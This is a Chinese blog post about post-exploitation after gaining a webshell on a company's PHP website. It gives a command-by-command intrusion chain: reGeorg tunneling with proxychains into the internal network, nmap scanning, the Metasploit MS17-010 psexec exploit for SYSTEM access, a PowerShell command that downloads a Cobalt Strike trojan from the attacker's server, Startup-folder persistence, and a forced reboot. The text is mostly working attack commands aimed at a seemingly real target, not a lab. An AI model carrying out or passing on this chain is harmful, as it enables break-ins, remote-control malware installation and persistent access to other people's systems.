拿到webshell之后的事情

之前搞站都是搞到后台管理员,或者搞到webshell就宣布结束了,,今天终于有机会学习一下后面的操作了。

公司网站为php的站,已经拿到webshell。可以进行菜刀连接。

菜刀虚拟终端

php -m #查看php是否有socket库,因为reGeory需要用到sockets库。

如果没有sockets,则上传的tunnel.php需要添加dl("php_sockers.dll")

reGeorg + proxychains 代理内网

 reGeorg 本地代理

python reGeorgSocksProxy.py -p 8080 -u http://222.252.10.101:8080/tunnel.php
#将http://222.252.10.101:8080代理到本地的8080端口

然后复制一个终端,proxychains上场。

注意proxychains的配置信息

vi /etc/proxychains.conf

添加

socket5 127.0.0.1 8080 #端口为上面配置的port

因为reGeorg使用的sockets协议,只支持tcp,所以没法ping通。

proxychains nmap -sT -Pn 172.168.10.50

看到445端口,就要想到ms17-010呀,你也可以proxychains命令行调用一下Nessus扫一下哈

利用msf获取system权限

proxychains -q msfconsole #-q 不显示proxychains的回显信息
#use exploit/windows/smb/ms17_010_psexec
#set rhost 172.168.10.50
#run
#shell
进入命令行

powershell下载并运行远控

可以用cobaltstrike生成对应系统的木马,将该木马放在自己已有的服务器上。

直接用powershell将木马从远程服务器下载到目标服务器中。 

>powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://自己已有服务器ip/zz.exe’,'c:zz.exe')

或者如果菜刀的权限比较高,可以直接将木马传到开机启动的路径下;

 
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
#win7的开机启动路径 C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp
#win10的开机启动路径 #根据服务器windows版本搜索对应的开机启动文件夹的路径
 

若菜刀权限比较低,可先用菜刀把马传到网站根路径下,再用msf-shell将木马复制到开机启动的路径下。因为有些远控马,必须当前用户启动木马后才有更多的功能,所以,先把远控马传到开机启动的路径下面,再msf使目标机器重启,即可达到目的。。。说的比较啰嗦,但这就是我所理解的,,如果有哪里不对,请您留言告诉我哈。

 msf重启目标机器//这一步并不一定得操作。。

shutdown -r -t 0 或 reboot

然后,连远控;;

原文地址:https://www.cnblogs.com/wjw-zm/p/11681926.html